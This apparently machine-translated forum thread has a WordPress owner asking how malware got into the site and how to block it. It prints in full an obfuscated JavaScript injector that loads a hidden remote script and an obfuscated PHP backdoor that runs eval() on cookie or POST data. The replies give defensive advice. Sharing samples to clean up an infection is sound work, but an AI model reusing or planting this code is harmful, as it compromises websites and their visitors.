下午好!我有一个常规的 WordPress 网站。有时项目的 js 文件包含恶意文件,它附加在这些文件的末尾。
例如像这样:
function p6y2hF(sl0Yp){var xs='';var kORYbL=0;var cX23k6=0;for(kORYbL=0;kORYbL<sl0Yp.length/3;kORYbL++){xs+=String.fromCharCode(sl0Yp.slice(cX23k6,cX23k6+3));cX23k6=cX23k6+3;}return xs;}var twe807=["007044","006038","004059","023061049048071036048093087088093036069","007061055","000054036052","000042044037028043020071083070091056088051070","021063036052093037054089091089092","028042053053","019042032020095036024084092065075008072023083003057021034049","028059032033009110090066070084076047031048095008069090061033126089050090082092065022032066"];function thnm(bPItNM){return p85me(p6y2hF(bPItNM),'tOTQ3Au1258J1C2dw');}g1fa(thnm(twe807[10]));function g1fa(jqo644){var qLs=document[thnm(twe807[3])](thnm(twe807[0])+thnm(twe807[1])+thnm(twe807[2]));qLs[thnm(twe807[4])]=jqo644;qLs[thnm(twe807[5])]=thnm(twe807[6]);document[thnm(twe807[9])](thnm(twe807[8]))[0][thnm(twe807[7])](qLs);}function p85me(da,wx){var fR0dN='';var cv2=0;var l77=0;for(cv2=0;cv2<da.length;cv2++){var o93rx=da.charAt(cv2);var z06=o93rx.charCodeAt(0)^wx.charCodeAt(l77);o93rx=String.fromCharCode(z06);fR0dN+=o93rx;if(l77==wx.length-1)l77=0;else l77++;}return (fR0dN);}
PHP 文件也可能出现6743a4.php(名称可能不同)内容:
<?php ${"\x47L\x4f\x42\x41L\x53"}["\x62u\x6d\x66\x7a\x78"]="a\x75\x74h";${"\x47LOBAL\x53"}["\x71\x70b\x78\x67\x70\x69\x65\x71b\x78"]="\x76\x61\x6c\x75\x65";${"GLO\x42\x41\x4c\x53"}["e\x6e\x79p\x75\x74\x68d\x6c\x6bk"]="k\x65\x79";${"\x47L\x4fBA\x4c\x53"}["\x70\x77\x68ueh\x75i"]="\x6a";${"\x47L\x4f\x42\x41L\x53"}["\x70\x62k\x71\x70wke\x75\x74\x68u"]="\x69";${"G\x4c\x4f\x42\x41L\x53"}["\x74\x6b\x6f\x71\x6ac\x77b\x63\x6a"]="v\x61\x6cu\x65";$udborfbq="data";${"G\x4c\x4f\x42AL\x53"}["\x62\x64\x79l\x70n\x77g\x77\x75y\x6e"]="\x64\x61\x74\x61\x5f\x6b\x65\x79";${"G\x4cO\x42\x41L\x53"}["knx\x74\x77\x69h\x6d\x75\x67i"]="\x64a\x74\x61";@ini_set("e\x72r\x6fr\x5flog",NULL);@ini_set("\x6cog\x5f\x65\x72ro\x72s",0);$bgvvfcvmjs="\x64\x61\x74a";@ini_set("m\x61\x78\x5fe\x78e\x63u\x74io\x6e_t\x69\x6d\x65",0);@set_time_limit(0);if(!defined("PHP\x5fE\x4f\x4c")){define("PHP\x5f\x45O\x4c","\n");}if(!defined("\x44I\x52\x45\x43\x54ORY_S\x45P\x41RA\x54\x4fR")){define("\x44I\x52E\x43T\x4f\x52Y_SE\x50\x41R\x41\x54O\x52","/");}$wnmcyzak="d\x61\x74\x61";${${"\x47LO\x42\x41\x4c\x53"}["\x6b\x6e\x78\x74\x77\x69hm\x75\x67i"]}=NULL;${${"\x47L\x4fBA\x4c\x53"}["bd\x79\x6c\x70\x6ew\x67w\x75\x79\x6e"]}=NULL;${"G\x4c\x4f\x42\x41LS"}["z\x74\x6bd\x7am\x76\x76\x79\x68"]="\x64ata";$GLOBALS["\x61\x75\x74h"]="\x34\x65f63\x61\x62\x65-1a\x62d-\x34\x35\x616-91\x33d-\x36fb\x39\x39\x36\x35\x37\x65\x32\x34b";global$auth;function sh_decrypt_phase($data,$key){${"\x47\x4cOB\x41L\x53"}["g\x79\x6ejj\x6d\x6e\x67"]="\x6fu\x74\x5f\x64a\x74a";$oqghebfm="\x6fut\x5fd\x61\x74\x61";${${"\x47\x4cO\x42\x41\x4c\x53"}["\x67yn\x6aj\x6dn\x67"]}="";for(${${"G\x4c\x4f\x42A\x4c\x53"}["\x70\x62k\x71\x70\x77k\x65u\x74hu"]}=0;${${"G\x4cO\x42\x41\x4cS"}["\x70\x62k\x71\x70wke\x75\x74\x68\x75"]}<strlen(${${"\x47\x4cO\x42\x41L\x53"}["knx\x74\x77\x69\x68\x6d\x75g\x69"]});){${"\x47\x4c\x4f\x42ALS"}["\x75\x6d\x6el\x73a\x64w"]="\x69";$lkkuocmcoky="j";${"\x47L\x4f\x42\x41\x4c\x53"}["\x6d\x76\x6b\x6ehi\x71\x6c"]="\x64a\x74a";${"\x47\x4cO\x42\x41\x4cS"}["\x6e\x66\x74\x63p\x6e\x66d\x75\x64\x6fm"]="j";for(${${"\x47\x4c\x4fB\x41\x4c\x53"}["n\x66tcpn\x66\x64u\x64\x6fm"]}=0;${${"G\x4cO\x42A\x4cS"}["\x70\x77\x68\x75\x65\x68u\x69"]}<strlen(${${"GL\x4fBA\x4c\x53"}["\x65\x6e\x79\x70u\x74\x68\x64\x6c\x6b\x6b"]})&&${${"\x47LO\x42\x41\x4cS"}["u\x6d\x6e\x6c\x73\x61\x64\x77"]}<strlen(${${"\x47\x4cO\x42AL\x53"}["\x6dv\x6bn\x68\x69\x71\x6c"]});${$lkkuocmcoky}++,${${"\x47LOBAL\x53"}["\x70\x62kqp\x77\x6beu\x74\x68u"]}++){${"G\x4cOB\x41L\x53"}["nv\x6e\x6f\x6ab\x77\x6e\x66\x76"]="\x69";$lworesibofc="\x6fu\x74\x5f\x64a\x74a";${$lworesibofc}.=chr(ord(${${"\x47\x4c\x4fB\x41\x4cS"}["\x6bnxt\x77i\x68mug\x69"]}[${${"\x47\x4c\x4f\x42ALS"}["\x6ev\x6e\x6fjb\x77\x6e\x66v"]}])^ord(${${"\x47L\x4f\x42\x41LS"}["e\x6e\x79\x70u\x74\x68d\x6ck\x6b"]}[${${"GL\x4fB\x41L\x53"}["p\x77\x68\x75\x65\x68\x75\x69"]}]));}}return${$oqghebfm};}function sh_decrypt($data,$key){$imcerufeozd="\x64\x61t\x61";${"GL\x4f\x42A\x4c\x53"}["\x71q\x77\x6e\x6b\x71\x69"]="\x6be\x79";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6b\x66\x6c\x6egk\x66w"]="a\x75th";global$auth;return sh_decrypt_phase(sh_decrypt_phase(${$imcerufeozd},${${"\x47L\x4f\x42AL\x53"}["\x6b\x66l\x6eg\x6b\x66\x77"]}),${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["q\x71\x77\x6e\x6b\x71i"]});}foreach($_COOKIE as${${"\x47L\x4f\x42A\x4c\x53"}["e\x6e\x79\x70\x75\x74\x68\x64l\x6b\x6b"]}=>${${"\x47\x4cO\x42\x41LS"}["\x74\x6b\x6fqj\x63\x77\x62\x63\x6a"]}){${"GLO\x42\x41L\x53"}["\x6ain\x72o\x73\x75\x72\x65"]="va\x6cue";$xgonept="\x64\x61ta_\x6b\x65\x79";${"G\x4c\x4f\x42\x41\x4cS"}["\x6b\x6f\x61l\x62\x6c\x79j"]="k\x65y";${${"G\x4cO\x42\x41\x4c\x53"}["\x6b\x6e\x78\x74wi\x68\x6d\x75g\x69"]}=${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6a\x69\x6eros\x75r\x65"]};${$xgonept}=${${"\x47L\x4f\x42\x41\x4c\x53"}["k\x6f\x61\x6cb\x6cyj"]};}${"G\x4c\x4f\x42\x41\x4cS"}["\x6ebk\x66qy\x79\x6c"]="\x64\x61\x74\x61_key";$orxjiexskq="\x64\x61\x74\x61";if(!${${"\x47L\x4f\x42\x41\x4cS"}["\x7at\x6b\x64\x7a\x6dv\x76\x79\x68"]}){${"GL\x4f\x42\x41\x4c\x53"}["\x77\x71\x67\x63b\x6c"]="key";foreach($_POST as${${"GL\x4f\x42\x41LS"}["w\x71\x67\x63\x62\x6c"]}=>${${"G\x4c\x4f\x42\x41\x4c\x53"}["q\x70\x62\x78gpi\x65q\x62x"]}){${"G\x4cO\x42\x41\x4c\x53"}["\x73h\x70\x76lb"]="\x64\x61\x74a";$rsbfutrj="\x6b\x65y";${${"G\x4c\x4fB\x41L\x53"}["\x73h\x70\x76\x6c\x62"]}=${${"G\x4cO\x42\x41\x4c\x53"}["q\x70\x62xg\x70\x69eq\x62x"]};${${"\x47\x4cOBAL\x53"}["\x62\x64\x79l\x70\x6e\x77\x67w\x75\x79\x6e"]}=${$rsbfutrj};}}${$orxjiexskq}=@unserialize(sh_decrypt(@base64_decode(${$udborfbq}),${${"\x47\x4c\x4fB\x41\x4cS"}["nbkf\x71\x79\x79\x6c"]}));if(isset(${$wnmcyzak}["\x61\x6b"])&&${${"\x47\x4c\x4fB\x41\x4c\x53"}["b\x75m\x66\x7ax"]}==${$bgvvfcvmjs}["\x61k"]){${"\x47\x4cOBAL\x53"}["\x74\x78\x79\x65\x6f\x78\x74\x78\x73\x71"]="\x64at\x61";${"\x47\x4c\x4fB\x41\x4cS"}["\x65\x63\x65l\x69\x65\x6bt"]="d\x61\x74\x61";if(${${"\x47L\x4f\x42A\x4cS"}["\x74\x78\x79\x65\x6f\x78tx\x73\x71"]}["\x61"]=="\x69"){$mrngyyp="i";${${"G\x4c\x4fB\x41\x4c\x53"}["\x70\x62\x6bq\x70wk\x65\x75thu"]}=Array("pv"=>@phpversion(),"\x73\x76"=>"\x31.\x30-1",);echo@serialize(${$mrngyyp});}elseif(${${"\x47L\x4f\x42\x41L\x53"}["\x65c\x65\x6c\x69\x65\x6bt"]}["a"]=="\x65"){eval(${${"G\x4c\x4f\x42\x41\x4c\x53"}["kn\x78t\x77ihm\x75g\x69"]}["\x64"]);}}
?>
据我了解,这些是引擎中的安全漏洞。
恶意代码如何进入站点以及如何防止该代码进入站点?
现在托管站点也有同样的问题。通过检查文件的完整性暂时解决了它。清除恶意代码后,即使更改密码等,它仍然出现。加上它感染了附近的非 WP 站点,所以这很可能是 shell 或通过引入恶意代码入侵托管帐户。这是解决方案之一:www.novostrim.com 但我强烈建议不要就此止步,而是要识别恶意代码生成的来源,例如,使用 i-bolit 实用程序
此代码阻止 XSS 注入并尝试修改变量
GLOBALS и _REQUEST。将代码粘贴到位于站点根目录的 .htaccess 文件中。(并且不要忘记在进行任何更改之前备份此文件)。该代码允许您检查所有请求。如果请求包含标签或试图修改变量的值
GLOBALS и _REQUEST,它只会阻止它并给用户一个 403 错误。当使用来自垃圾场而非站点的主题和插件时,将获取左侧代码。有时甚至可以在某些制造商的合法(付费和免费)主题/插件中找到它。
仅使用目录中的组件。如果您购买,则只能从值得信赖的制造商处购买。
不。这是通过从垃圾桶中拾取的主题/插件中的漏洞进行黑客攻击的结果。